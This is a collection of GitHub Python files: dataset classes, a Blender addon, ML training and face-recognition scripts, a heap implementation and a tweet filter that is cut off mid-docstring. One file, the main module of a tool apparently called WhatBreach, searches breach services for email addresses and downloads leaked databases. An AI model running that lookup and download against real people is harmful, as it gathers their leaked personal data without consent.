+{"seq_id":"34618451737","text":"import os.path as osp\n\nfrom .builder import DATASETS\nfrom .custom import CustomDataset\n\n\n@DATASETS.register_module()\nclass A2D2Dataset34Classes(CustomDataset):\n \"\"\"The A2D2 dataset with the original semantic segmentation classes.\n\n The dataset features 41,280 frames with semantic segmentation having 34\n classes. The original set of 38 classes are reduced to 34 for reasons\n explained bellow.\n\n The segmentation conversion is defined in the following file:\n tools/convert_datasets/a2d2.py\n\n Instance segmentations and some segmentation classes are collapsed to\n follow the categorical 'trainids' label format.\n Ex: 'Car 1' and 'Car 2' --> 'Car'\n\n The color palette follows the coloring in 'class_list.json'.\n\n The following segmentation classes are ignored (i.e. trainIds 255):\n - Ego car: A calibrated system should a priori know what input\n region corresponds to the ego vehicle.\n - Blurred area: Ambiguous semantic.\n - Rain dirt: Ambiguous semantic.\n\n The following segmentation class is merged due to rarity:\n - Speed bumper --> RD normal street (randomly parsing 50% of dataset\n results in only one sample containing the 'speed_bumper' semantic)\n\n The ``img_suffix`` is fixed to '.png' and ``seg_map_suffix`` is\n fixed to '_34LabelTrainIds.png' for the 34 class A2D2 dataset.\n\n Ref: https://www.a2d2.audi/a2d2/en/dataset.html\n \"\"\"\n\n CLASSES = ('rd_normal_street', 'non-drivable_street', 'rd_restricted_area',\n 'drivable_cobblestone', 'slow_drive_area', 'parking_area',\n 'solid_line', 'dashed_line', 'zebra_crossing', 'grid_structure',\n 'traffic_guide_obj', 'painted_drive_instr', 'sidewalk',\n 'curbstone', 'buildings', 'sidebars', 'road_blocks', 'poles',\n 'traffic_signal', 'traffic_sign', 'signal_corpus',\n 'irrelevant_signs', 'electronic_traffic', 'nature_object',\n 'sky', 'pedestrian', 'bicycle', 'car', 'utility_vehicle',\n 'truck', 'tractor', 'small_vehicles', 'animals',\n 'obstacles_trash')\n\n PALETTE = [[255, 0, 255], [139, 99, 108], [150, 0, 150], [180, 50, 180],\n [238, 233, 191], [150, 150, 200], [255, 193, 37], [128, 0, 255],\n [210, 50, 115], [238, 162, 173], [159, 121,\n 238], [200, 125, 210],\n [180, 150, 200], [128, 128, 0], [241, 230, 255], [233, 100, 0],\n [185, 122, 87], [255, 246, 143], [0, 128, 255], [30, 220, 220],\n [33, 44, 177], [64, 0, 64], [255, 70, 185], [147, 253, 194],\n [135, 206, 255], [204, 153, 255], [182, 89, 6], [255, 0, 0],\n [255, 255, 0], [255, 128, 0], [0, 0, 100], [0, 255, 0],\n [204, 255, 153], [255, 0, 128]]\n\n def __init__(self, **kwargs):\n super(A2D2Dataset34Classes, self).__init__(\n img_suffix='.png', seg_map_suffix='_34LabelTrainIds.png', **kwargs)\n assert osp.exists(self.img_dir) is not None\n","repo_name":"ViCE-model/ViCE-model","sub_path":"mmsegmentation/mmseg/datasets/a2d2_34cls.py","file_name":"a2d2_34cls.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"18777165552","text":"###############################################################################################################################\r\n'''\r\n __ __ _ ___ _ _\r\n \\ \\ / / ___ _ _ | |_ ___ __ __ | _ \\ __ _ _ _ __| | ___ _ __ (_) ___ ___ _ _\r\n \\ / / -_)| '_|| _|/ -_)\\ \\ / | // _` || ' \\ / _` |/ _ \\| ' \\ | ||_ // -_)| '_|\r\n \\_/ \\___||_| \\__|\\___|/_\\_\\ |_|_\\\\__/_||_||_|\\__/_|\\___/|_|_|_||_|/__|\\___||_|\r\n\r\n '''\r\n###############################################################################################################################\r\n\r\nbl_info = {\r\n \"name\": \"Vertex Randomizer\",\r\n \"author\": \"DS89\",\r\n \"version\": (1, 0),\r\n \"blender\": (2, 80, 0),\r\n \"location\": \"Properties > Object > Vertex Randomizer\",\r\n \"description\": \"Changes location of vertices at random\",\r\n \"warning\": \"Add a shape key in order to enable the addon\",\r\n \"doc_url\": \"\",\r\n \"category\": \"Add Mesh\",\r\n}\r\n\r\nimport bpy\r\nimport random\r\n\r\n\r\n# Add a shape key to an object if one does not exist\r\ndef AddShapeKey(self, context):\r\n object = bpy.context.active_object\r\n if object.active_shape_key_index == 0:\r\n bpy.ops.object.shape_key_add(from_mix = False)\r\n bpy.ops.object.shape_key_add(from_mix = False)\r\n\r\n# Addon panel\r\nclass VertexRandomizer(bpy.types.Panel):\r\n bl_label = \"Vertex Randomizer\"\r\n bl_idname = \"SCENE_PT_layout\"\r\n bl_space_type = 'PROPERTIES'\r\n bl_region_type = 'WINDOW'\r\n bl_context = \"data\"\r\n\r\n# Creates the panel for the user interface\r\n def draw(self, context):\r\n layout = self.layout\r\n scene = context.scene\r\n vrtool = scene.vr_tool\r\n\r\n # Panel object indicator\r\n object = bpy.context.active_object\r\n\r\n # Shape key data (Controls the intensity of shape key)\r\n shape = object.data.shape_keys\r\n current = object.active_shape_key_index\r\n\r\n # Scene data (Inputs the location of scene from panel)\r\n scene = context.scene\r\n vrtool = scene.vr_tool\r\n min = vrtool.min_shape\r\n max = vrtool.max_shape\r\n min_key = vrtool.min_key\r\n max_key = vrtool.max_key\r\n key_value = bpy.data.shape_keys[\"Key\"].key_blocks[current].value\r\n str_val = round(key_value, 3)\r\n\r\n # Layout data\r\n layout.label(text = \"Selected object: \"+object.name)\r\n row = layout.row()\r\n row.operator('vr.addshape')\r\n layout.label(text = \"Key intensity range\")\r\n row = layout.row()\r\n row.prop(vrtool, 'min_key')\r\n row.prop(vrtool, 'max_key')\r\n row = layout.row()\r\n layout.label(text = \"Shape distortion amount\")\r\n row = layout.row()\r\n row.prop(vrtool, 'min_shape')\r\n row.prop(vrtool, 'max_shape')\r\n row = layout.row()\r\n layout.label(text = \"Current key value: \"+str(str_val))\r\n row = layout.row()\r\n row.operator('vr.distortshape')\r\n\r\n\r\n# Add a shape key if there are none availible\r\n\r\nclass AddShapeOp(bpy.types.Operator):\r\n \"\"\"Add shape key to object if none are present\"\"\"\r\n bl_label = 'Add shape key'\r\n bl_idname = 'vr.addshape'\r\n\r\n def execute(self,context):\r\n object = bpy.context.active_object\r\n AddShapeKey(self, context)\r\n return {'FINISHED'}\r\n\r\n# User defined input\r\n\r\nclass VertexValue(bpy.types.PropertyGroup):\r\n min_shape:bpy.props.FloatProperty(\r\n name = \"Min:\",\r\n description = \"Set minimum vertex position float value\",\r\n soft_max = 1,\r\n soft_min = -1\r\n )\r\n max_shape:bpy.props.FloatProperty(\r\n name = \"Max:\",\r\n description = \"Set maximum vertex position float value\",\r\n soft_max = 1,\r\n soft_min = -1\r\n )\r\n min_key:bpy.props.FloatProperty(\r\n name = \"Min:\",\r\n description = \"Set minimum shape key float value\",\r\n soft_max = 1,\r\n soft_min = 0\r\n )\r\n max_key:bpy.props.FloatProperty(\r\n name = \"Max:\",\r\n description = \"Set maximum shape key float value\",\r\n soft_max = 1,\r\n soft_min = 0\r\n )\r\n\r\n\r\nclass RandomDistortion(bpy.types.Operator):\r\n \"\"\"Randomize the vertices\"\"\"\r\n bl_label = \"Distort shape key\"\r\n bl_idname = 'vr.distortshape'\r\n bl_options = {'REGISTER', 'UNDO'}\r\n\r\n def execute(self, context):\r\n # Active object data (Determines objects in scene)\r\n selected = bpy.context.selectable_objects\r\n object = bpy.context.active_object\r\n verts = object.data.vertices\r\n active = selected and object\r\n\r\n # Shape key data (Controls the intensity of shape key)\r\n shape=object.data.shape_keys\r\n current=object.active_shape_key_index\r\n\r\n # Scene data (Inputs the location of scene from panel)\r\n scene = context.scene\r\n vrtool = scene.vr_tool\r\n\r\n # Distort code\r\n if vrtool.min_shape != 0 or vrtool.max_shape != 0:\r\n min = vrtool.min_shape\r\n max = vrtool.max_shape\r\n min_key = vrtool.min_key\r\n max_key = vrtool.max_key\r\n keyFlo = random.uniform(min_key, max_key)\r\n randInt = random.randrange(1000)\r\n bpy.data.shape_keys[\"Key\"].key_blocks[current].value = keyFlo\r\n randFlo = random.uniform(min,max)\r\n bpy.ops.object.editmode_toggle()\r\n bpy.ops.mesh.select_random(seed=randInt)\r\n bpy.ops.transform.vertex_random(offset = randFlo, seed = randInt)\r\n bpy.ops.object.editmode_toggle()\r\n else:\r\n self.report({'ERROR'}, \"Min and max values must be greater than or less than zero\")\r\n return {'FINISHED'}\r\n\r\nclasses = [VertexValue, VertexRandomizer, AddShapeOp, RandomDistortion]\r\n\r\ndef register():\r\n for cls in classes:\r\n bpy.utils.register_class(cls)\r\n bpy.types.Scene.vr_tool = bpy.props.PointerProperty(type = VertexValue)\r\n\r\n\r\ndef unregister():\r\n for cls in classes:\r\n bpy.utils.register_class(cls)\r\n del bpy.types.Scene.vr_tool\r\n\r\nif __name__ is \"__main__\":\r\n register()\r\n","repo_name":"dsa89/Vertex-Randomizer","sub_path":"Vertex Randomizer.py","file_name":"Vertex Randomizer.py","file_ext":"py","file_size_in_byte":6187,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"36392982867","text":"import argparse\nimport tensorflow as tf\nimport os\nimport sys\nimport time\nimport yaml\nfrom tqdm import tqdm\n\nfrom tensorflow.keras.optimizers.schedules import PiecewiseConstantDecay\nfrom dataset import create_batch_generator\nfrom anchor import generate_default_boxes\nfrom network import create_ssd\nfrom losses import create_losses\n\n@tf.function\ndef train_step(imgs, gt_confs, gt_locs, ssd, criterion, optimizer):\n with tf.GradientTape() as tape:\n confs, locs = ssd(imgs)\n\n conf_loss, loc_loss = criterion(\n confs, locs, gt_confs, gt_locs)\n\n loss = conf_loss + loc_loss\n l2_loss = [tf.nn.l2_loss(t) for t in ssd.trainable_variables]\n l2_loss = args.weight_decay * tf.math.reduce_sum(l2_loss)\n loss += l2_loss\n\n gradients = tape.gradient(loss, ssd.trainable_variables)\n optimizer.apply_gradients(zip(gradients, ssd.trainable_variables))\n\n return loss, conf_loss, loc_loss, l2_loss\n\n\nif __name__ == '__main__':\n gpus = tf.config.experimental.list_physical_devices('GPU')\n \n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--anno-path', default='dataset/server_room/train_digit.txt')\n parser.add_argument('--data-year', default='2007')\n parser.add_argument('--arch', default='ssd300')\n parser.add_argument('--batch-size', default=64, type=int)\n parser.add_argument('--num-batches', default=-1, type=int)\n parser.add_argument('--neg-ratio', default=3, type=int)\n parser.add_argument('--initial-lr', default=1e-3, type=float)\n parser.add_argument('--momentum', default=0.9, type=float)\n parser.add_argument('--weight-decay', default=5e-4, type=float)\n parser.add_argument('--num-epochs', default=100, type=int)\n parser.add_argument('--checkpoint-dir', default='./check_points/ssd')\n parser.add_argument('--checkpoint-path', default=None) # latest 'check_points/ssd/ssd_epoch_latest.h5'\n parser.add_argument('--pretrained-type', default='base')\n parser.add_argument('--gpu-id', default='0')\n\n args = parser.parse_args()\n\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id\n\n os.makedirs(args.checkpoint_dir, exist_ok=True)\n \n \n labels = ['0','1','2','3','4','5','6','7','8','9', '.']\n \n NUM_CLASSES = len(labels) + 1\n\n with open('model/tensorflow/ssd/config.yml') as f:\n cfg = yaml.load(f, Loader=yaml.Loader)\n\n try:\n config = cfg[args.arch.upper()]\n except AttributeError:\n raise ValueError('Unknown architecture: {}'.format(args.arch))\n\n default_boxes = generate_default_boxes(config)\n\n batch_generator, info = create_batch_generator(\n args.anno_path, default_boxes,\n config['image_size'],\n args.batch_size, args.num_batches,\n mode='train', augmentation = False,labels = labels) # the patching algorithm is currently causing bottleneck sometimes , augmentation=['flip']\n \n try:\n ssd = create_ssd(NUM_CLASSES, args.arch,\n args.pretrained_type,\n checkpoint_dir=args.checkpoint_path, checkpoint_path=args.checkpoint_path)\n except Exception as e:\n print(e)\n print('The program is exiting...')\n sys.exit()\n\n criterion = create_losses(args.neg_ratio, NUM_CLASSES)\n\n steps_per_epoch = info['length'] // args.batch_size\n\n lr_fn = PiecewiseConstantDecay(\n boundaries=[int(steps_per_epoch * args.num_epochs * 2 / 3),\n int(steps_per_epoch * args.num_epochs * 5 / 6)],\n values=[args.initial_lr, args.initial_lr * 0.1, args.initial_lr * 0.01])\n \n optimizer = tf.keras.optimizers.Adam(learning_rate=lr_fn)\n\n train_log_dir = './check_points/ssd/logs/train'\n train_summary_writer = tf.summary.create_file_writer(train_log_dir)\n\n for epoch in range(args.num_epochs):\n avg_loss = 0.0\n avg_conf_loss = 0.0\n avg_loc_loss = 0.0\n start = time.time()\n i = 0\n progress = tqdm(batch_generator)\n for _, imgs, gt_confs, gt_locs in progress:\n loss, conf_loss, loc_loss, l2_loss = train_step(imgs, gt_confs, gt_locs, ssd, criterion, optimizer)\n \n avg_loss = (avg_loss * i + loss.numpy()) / (i + 1)\n avg_conf_loss = (avg_conf_loss * i + conf_loss.numpy()) / (i + 1)\n avg_loc_loss = (avg_loc_loss * i + loc_loss.numpy()) / (i + 1)\n \n progress.set_description('Epoch: {} Batch {} Time: {:.2}s | Loss: {:.4f} Conf: {:.4f} Loc: {:.4f}'.format(\n epoch + 1, i + 1, time.time() - start, avg_loss, avg_conf_loss, avg_loc_loss))\n \n i = i + 1\n \n # avg_val_loss = 0.0\n # avg_val_conf_loss = 0.0\n # avg_val_loc_loss = 0.0\n # for i, (_, imgs, gt_confs, gt_locs) in enumerate(val_generator):\n # val_confs, val_locs = ssd(imgs)\n # val_conf_loss, val_loc_loss = criterion(val_confs, val_locs, gt_confs, gt_locs)\n # val_loss = val_conf_loss + val_loc_loss\n # avg_val_loss = (avg_val_loss * i + val_loss.numpy()) / (i + 1)\n # avg_val_conf_loss = (avg_val_conf_loss * i + val_conf_loss.numpy()) / (i + 1)\n # avg_val_loc_loss = (avg_val_loc_loss * i + val_loc_loss.numpy()) / (i + 1)\n\n with train_summary_writer.as_default():\n tf.summary.scalar('loss', avg_loss, step=epoch)\n tf.summary.scalar('conf_loss', avg_conf_loss, step=epoch)\n tf.summary.scalar('loc_loss', avg_loc_loss, step=epoch)\n\n if (epoch + 1) % 10 == 0:\n ssd.save_weights(os.path.join(args.checkpoint_dir, 'ssd_epoch_{}.h5'.format(epoch + 1)))\n \n if (epoch + 1) % 10 == 0:\n ssd.save_weights(os.path.join(args.checkpoint_dir, 'ssd_epoch_latest.h5'))\n","repo_name":"dataignitelab/iot_ai_model","sub_path":"model/tensorflow/ssd/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5841,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"91"}
+{"seq_id":"402628124","text":"import tkinter #requires specify that imported methods comes from this pack\r\n#from tkinter import *\r\nmaster = tkinter.Tk()\r\n\r\ncanvas_width = 80\r\ncanvas_height = 40\r\nw = tkinter.Canvas(master, \r\n width=canvas_width,\r\n height=canvas_height)\r\nw.pack()\r\n\r\ny = int(canvas_height / 2)\r\nw.create_line(0, y, canvas_width, y, fill=\"#476042\", width=2)\r\n#variables in \"create_line\" are: (x_start, y_start, x_end, y_end, color, width)\r\n\r\nmaster.mainloop()","repo_name":"M4RC7/my-portfolio","sub_path":"Python/tk_linespec.py","file_name":"tk_linespec.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"38713750776","text":"\nimport re\n\n\nimport pytc\nhdb = pytc.HDB()\nhdb.open( 'intcorpus.tch', pytc.BDBOWRITER | pytc.BDBOREADER | pytc.BDBOCREAT)\n\nimport pymongo\nC = pymongo.Connection( 'localhost').corpusdb\n\ndef main():\n\tnumbers = re.compile( r'\\d')\n\tkeys = open('keys').xreadlines()\n\tfor key in keys:\n\t\tif not numbers.search( key):\n\t\t\tcount = hdb.addint( key[:-1], 0)\n\t\t\tC.df.insert( {'term':key[:-1], 'count':count})\n\nif __name__ == '__main__': main()\n","repo_name":"japherwocky/wikiparser","sub_path":"tcexport.py","file_name":"tcexport.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"27456399447","text":"class MinHeap:\n # MinHeap tracks the minimum element as the element at \n # index 1 within an internal Python list.\n # When adding elements, we use .heapify_up() to compare the \n # new element with its parent, making swaps if it violates the\n # heap property: children must be greater than their parents.\n # When removing the minimum element, we swap it with the last \n # element in the list. Then we use .heapify_down() to compare\n # the new root with its children, swapping with the smaller \n # child if necessary.\n def __init__(self):\n # Creates a list and count variable\n self.heap_list = [None]\n self.count = 0\n\n # HEAP HELPER METHODS\n # DO NOT CHANGE!\n # “child” and “parent” elements are determined by their relative indices \n # within the internal list. By doing some arithmetic on an element’s index, \n # we can determine the indices for parent and child elements (if they exist).\n def parent_idx(self, idx):\n # heap.parent_idx(4)\n # (4 // 2) == 2\n # Element at index 4 is 61 \n # Element at index 2 is 13\n # The parent element of 61 is 13\n return idx // 2\n\n def left_child_idx(self, idx):\n # heap.left_child(3)\n # (3 * 2) == 6\n # Element at index 3 is 21\n # Element at index 6 is 23\n # The left child element of 21 is 23\n return idx * 2\n\n def right_child_idx(self, idx):\n return idx * 2 + 1\n\n def child_present(self, idx):\n return self.left_child_idx(idx) <= self.count\n\n # END OF HEAP HELPER METHODS\n \n # Some key methods to be included in the MinHeap class\n \n # Replaces root with last child, calls .heapify-down()\n def retrieve_min(self):\n if self.count == 0:\n print(\"No items in heap\")\n return None\n \n min = self.heap_list[1]\n print(\"Removing: {0} from {1}\".format(min, self.heap_list))\n self.heap_list[1] = self.heap_list[self.count]\n self.count -= 1 # swap\n self.heap_list.pop() # swap\n print(\"Last element moved to first: {0}\".format(self.heap_list)) \n self.heapify_down()\n return min\n \n \n # Adds new element to heap_list, calls heapify_up() \n def add(self, element):\n self.count += 1\n print(\"Adding: {0} to {1}\".format(element, self.heap_list))\n self.heap_list.append(element)\n self.heapify_up()\n \n \n # Returns the child a parent should swap with\n def get_smaller_child_idx(self, idx):\n if self.right_child_idx(idx) > self.count:\n print(\"There is only a left child\")\n return self.left_child_idx(idx)\n else:\n left_child = self.heap_list[self.left_child_idx(idx)]\n right_child = self.heap_list[self.right_child_idx(idx)]\n if left_child < right_child:\n print(\"Left child is smaller\")\n return self.left_child_idx(idx)\n else:\n print(\"Right child is smaller\")\n return self.right_child_idx(idx)\n \n \n # Implements heapify up\n def heapify_up(self): \n idx = self.count\n while self.parent_idx(idx) > 0:\n if self.heap_list[self.parent_idx(idx)] > self.heap_list[idx]:\n tmp = self.heap_list[self.parent_idx(idx)]\n print(\"swapping {0} with {1}\".format(tmp, self.heap_list[idx]))\n self.heap_list[self.parent_idx(idx)] = self.heap_list[idx]\n self.heap_list[idx] = tmp\n \n idx = self.parent_idx(idx)\n \n print(\"HEAP RESTORED! {0}\".format(self.heap_list))\n print(\"\")\n\n # def heapify_up(self):\n # print(\"Heapifying up\")\n # idx = self.count\n # while self.parent_idx(idx) > 0:\n # child = self.heap_list[idx]\n # parent = self.heap_list[self.parent_idx(idx)]\n # if parent > child:\n # print(\"swapping {0} with {1}\".format(parent, child))\n # self.heap_list[idx] = parent\n # self.heap_list[self.parent_idx(idx)] = child\n # idx = self.parent_idx(idx)\n # print(\"Heap Restored {0}\".format(self.heap_list))\n \n # Implements heapify down\n def heapify_down(self):\n idx = 1\n while self.child_present(idx):\n smaller_child_idx = self.get_smaller_child_idx(idx)\n if self.heap_list[idx] > self.heap_list[smaller_child_idx]:\n tmp = self.heap_list[smaller_child_idx]\n print(\"swapping {0} with {1}\".format(self.heap_list[idx], tmp))\n self.heap_list[smaller_child_idx] = self.heap_list[idx]\n self.heap_list[idx] = tmp\n\n idx = smaller_child_idx\n print(\"HEAP RESTORED! {0}\".format(self.heap_list))\n print(\"\") \n\n \n \n \n # count swaps \n# class MinHeap:\n# def __init__(self):\n# self.heap_list = [None]\n# self.count = 0\n\n# def parent_idx(self, idx):\n# return idx // 2\n\n# def left_child_idx(self, idx):\n# return idx * 2\n\n# def right_child_idx(self, idx):\n# return idx * 2 + 1\n\n# def child_present(self, idx):\n# return self.left_child_idx(idx) <= self.count\n \n# def retrieve_min(self):\n# if self.count == 0:\n# print(\"No items in heap\")\n# return None\n \n# min = self.heap_list[1]\n# self.heap_list[1] = self.heap_list[self.count]\n# self.count -= 1\n# self.heap_list.pop()\n# self.heapify_down()\n# return min\n\n# def add(self, element):\n# self.count += 1\n# self.heap_list.append(element)\n# self.heapify_up()\n\n\n# def get_smaller_child_idx(self, idx):\n# if self.right_child_idx(idx) > self.count:\n# return self.left_child_idx(idx)\n# else:\n# left_child = self.heap_list[self.left_child_idx(idx)]\n# right_child = self.heap_list[self.right_child_idx(idx)]\n# if left_child < right_child:\n# return self.left_child_idx(idx)\n# else:\n# return self.right_child_idx(idx)\n \n# def heapify_up(self):\n# idx = self.count\n# swap_count = 0\n# while self.parent_idx(idx) > 0:\n# if self.heap_list[self.parent_idx(idx)] > self.heap_list[idx]:\n# swap_count += 1\n# tmp = self.heap_list[self.parent_idx(idx)]\n# self.heap_list[self.parent_idx(idx)] = self.heap_list[idx]\n# self.heap_list[idx] = tmp\n# idx = self.parent_idx(idx)\n\n# element_count = len(self.heap_list)\n# if element_count > 10000:\n# print(\"Heap of {0} elements restored with {1} swaps\"\n# .format(element_count, swap_count))\n# print(\"\") \n \n# def heapify_down(self):\n# idx = 1\n# # starts at 1 because we swapped first and last elements\n# swap_count = 1\n# while self.child_present(idx):\n# smaller_child_idx = self.get_smaller_child_idx(idx)\n# if self.heap_list[idx] > self.heap_list[smaller_child_idx]:\n# swap_count += 1\n# tmp = self.heap_list[smaller_child_idx]\n# self.heap_list[smaller_child_idx] = self.heap_list[idx]\n# self.heap_list[idx] = tmp\n# idx = smaller_child_idx\n\n# element_count = len(self.heap_list)\n# if element_count >= 10000:\n# print(\"Heap of {0} elements restored with {1} swaps\"\n# .format(element_count, swap_count))\n# print(\"\") \n","repo_name":"israelias/data-structures","sub_path":"heap/minheap.py","file_name":"minheap.py","file_ext":"py","file_size_in_byte":7424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"20791009680","text":"import json\nimport subprocess\n\nfrom lib.cmd import Parser\nfrom hookers.hunter_io_hook import HunterIoHook\nfrom hookers.hibp_hook import BeenPwnedHook\nfrom hookers.dehashed_hook import DehashedHook\nfrom hookers.databasestoday_hook import DatabasesTodayHook\nfrom lib.settings import (\n BANNER,\n display_found_databases,\n grab_api_tokens,\n check_ten_minute_email,\n TEN_MINUTE_EMAIL_EXTENSION_LIST\n)\nfrom lib.formatter import (\n info,\n error,\n warn,\n prompt\n)\n\n\ndef main():\n try:\n opt = Parser().optparse()\n print(BANNER)\n res = Parser().check_opts(opt)\n if res is not None:\n to_search = res\n else:\n to_search = []\n do_not_search = []\n\n if len(to_search) == 0:\n if opt.singleEmail is None and opt.emailFile is None:\n warn(\"you have not provided an email to scan, redirecting to the help menu\")\n subprocess.call([\"python\", \"whatbreach.py\", \"--help\"])\n exit(1)\n if opt.searchHunterIo and opt.singleEmail is not None:\n info(\"starting search on hunter.io using {}\".format(opt.singleEmail))\n api_tokens = grab_api_tokens()\n file_results = HunterIoHook(\n opt.singleEmail, api_tokens[\"hunter.io\"], verify_emails=opt.verifyEmailsThroughHunterIo\n ).hooker()\n with open(file_results) as data:\n emails = json.loads(data.read())[\"discovered_emails\"]\n for email in emails:\n to_search.append(email)\n elif opt.singleEmail is not None:\n info(\"starting search on single email address: {}\".format(opt.singleEmail))\n to_search = [opt.singleEmail]\n elif opt.emailFile is not None:\n try:\n open(opt.emailFile).close()\n except IOError:\n error(\"unable to open file, does it exist?\")\n exit(1)\n with open(opt.emailFile) as emails:\n info(\"parsing email file: {}\".format(opt.emailFile))\n to_search = emails.readlines()\n info(\"starting search on a total of {} email(s)\".format(len(to_search)))\n\n for email in to_search:\n email = email.strip()\n\n if opt.checkTenMinuteEmail:\n if check_ten_minute_email(email, TEN_MINUTE_EMAIL_EXTENSION_LIST):\n warn(\"email: {} appears to be a ten minute email\".format(email))\n answer = prompt(\"would you like to process the email[y/N]\")\n if answer.startswith(\"n\"):\n do_not_search.append(email)\n\n if email not in do_not_search:\n info(\"searching breached accounts on HIBP related to: {}\".format(email))\n account_dumps = BeenPwnedHook(email).account_hooker()\n info(\"searching for paste dumps on HIBP related to: {}\".format(email))\n\n if opt.searchPastebin:\n paste_dumps = BeenPwnedHook(email).paste_hooker()\n else:\n warn(\"suppressing discovered pastes\")\n paste_dumps = []\n\n if account_dumps is not None and paste_dumps is not None:\n info(\n \"found a total of {} database breach(es) and a total of {} paste(s) pertaining to: {}\".format(\n len(account_dumps), len(paste_dumps), email\n )\n )\n if opt.searchDehashed:\n found_databases = DehashedHook(account_dumps).hooker()\n else:\n warn(\"suppressing discovered databases\")\n found_databases = {}\n for i, dump in enumerate(paste_dumps, start=1):\n found_databases[\"Paste#{}\".format(i)] = str(dump)\n display_found_databases(found_databases)\n if opt.downloadDatabase:\n for item in found_databases.keys():\n if \"Paste\" not in item:\n info(\"searching for downloadable databases using query: {}\".format(item.lower()))\n downloaded = DatabasesTodayHook(\n str(item), downloads_directory=opt.saveDirectory\n ).hooker()\n if len(downloaded) != 0:\n info(\n \"downloaded a total of {} database(s) pertaining to query: {}\".format(\n len(downloaded), item\n )\n )\n display_found_databases(downloaded, is_downloaded=True)\n else:\n warn(\n \"no databases appeared to be preset and downloadable related to query: {}\".format(\n str(item)\n )\n )\n\n elif account_dumps is not None and paste_dumps is None:\n info(\"found a total of {} database breach(es) pertaining to: {}\".format(len(account_dumps), email))\n if opt.searchDehashed:\n found_databases = DehashedHook(account_dumps).hooker()\n else:\n warn(\"suppressing discovered databases\")\n found_databases = {}\n if len(found_databases) != 0:\n display_found_databases(found_databases)\n if opt.downloadDatabase:\n for item in found_databases.keys():\n if \"Paste\" not in item:\n info(\"searching for downloadable databases using query: {}\".format(item.lower()))\n downloaded = DatabasesTodayHook(\n str(item), downloads_directory=opt.saveDirectory\n ).hooker()\n if len(downloaded) != 0:\n info(\n \"downloaded a total of {} database(s) pertaining to query: {}\".format(\n len(downloaded), item\n )\n )\n display_found_databases(downloaded, is_downloaded=True)\n else:\n warn(\n \"no databases appeared to be preset and downloadable related to query: {}\".format(\n str(item)\n )\n )\n else:\n warn(\"no output to show, most likely due to output suppression or dehashed\")\n elif account_dumps is None and paste_dumps is not None:\n # this should never happen\n error(\"no database dumps found nor any pastes found for: {}\".format(email))\n else:\n error(\"email {} was not found in any breach\".format(email))\n\n if opt.staySalty:\n # i know that you think that you know shit\n # all the shade that's coming at me I wonder who throws it\n # you can't see the vision boy, you must be outta focus\n # that's a real hot program homie, I wonder who wrote it? oh shit\n # (lyrics ripped from iSpy by Kyle, all I do is steal bruh)\n warn(\"all this code was stolen with <3 by Eku\")\n except KeyboardInterrupt:\n error(\"user quit the session\")","repo_name":"falocab/WharBreach","sub_path":"whatbreach/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"35475378136","text":"import pickle\nfrom facenet_pytorch import MTCNN, InceptionResnetV1\nfrom main import image_to_embedding\nfrom sklearn.preprocessing import Normalizer\nimport cv2\nimport time\nimport sys\n\ndef predict(image):\n\n clf = pickle.load(open(\"model.sav\", 'rb'))\n\n mtcnn = MTCNN()\n resnet = InceptionResnetV1(pretrained='vggface2', classify=True).eval()\n\n embedded = image_to_embedding(mtcnn, resnet, image)\n\n in_encoder = Normalizer(norm='l2')\n embedded = in_encoder.transform(embedded)\n\n probabilities = clf.predict(embedded)\n print(probabilities)\n '''\n top_n = sorted(range(len(probabilities[0])), key=lambda i: probabilities[0][i])[-20:]\n\n for i in top_n:\n print(probabilities[0][i], clf.classes_[i])\n '''\n\ndef webcam_predict(photo_time = 5):\n cam = cv2.VideoCapture(0)\n for i in range(photo_time, 0, -1):\n print(\"Taking photo in \" + str(i) + \" seconds\")\n time.sleep(1)\n\n frame = cam.read()[1]\n cv2.imwrite('face.png', frame)\n del(cam)\n\n predict('face.png')\n\n# sys.stdout = open(\"results.txt\", \"w\")\npredict('face.jpeg')\n","repo_name":"khang-11/simple_facial_recognition","sub_path":"model_predict.py","file_name":"model_predict.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"13502742509","text":"#Campbell Boswell & Scott Westvold\n#AIM - Automated Investment Manager\n#cs701 - Senior Project\n#processTweet.py\n\n\n\"\"\"\nFilters Tweets based on content so that only relevant tweets are analyzed and\nscored for sentiment. The filtered Tweets are defined as those which contain\nthe name or ticker symbol of a company listed on the S&P 500 or Tweets which\ncontain a reference to the market in general (as defined in market_keywords.py).\n\nPossible next steps for advanced filtering which might be benificial if working\nwith a larger corpus of tweets include:\n - Throwing out any tweets that contain links (indicated by strings www. and\n http), as they are likely just links to articles (or spam) and will\n be difficult to pull sentiment from. This seems a little overly\n restrictive in the current twitter-sphere though, as most tweets include\n links (potentially commenting on an article), and our sample base is\n hand selected to manually filter out accounts which are prone to spam.\n - Previous works (Bollen et al. and Mittal et al.) have restricted\n tweets to those containing words/phrases such as \"feel\", \"makes me\",\n \"I'm\", \"I am\" - this could help filter both spam and difficult to\n analyze tweets, but seems overly restrictive given the realtively small\n copus of twitter users, as well as the fact that the corpus we are working\n with has been manually selected.\n\"\"\"\nimport market_keywords\nimport company_filter\nimport company_filter_except\nimport config\nimport csv\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom pymongo import MongoClient\nimport string\n\nSTOP_WORDS = set(stopwords.words('english'))\n\n\ndef import_companies():\n '''\n A function which imports filter strings from a csv (companies.csv). As a\n means of filtering, we will build our 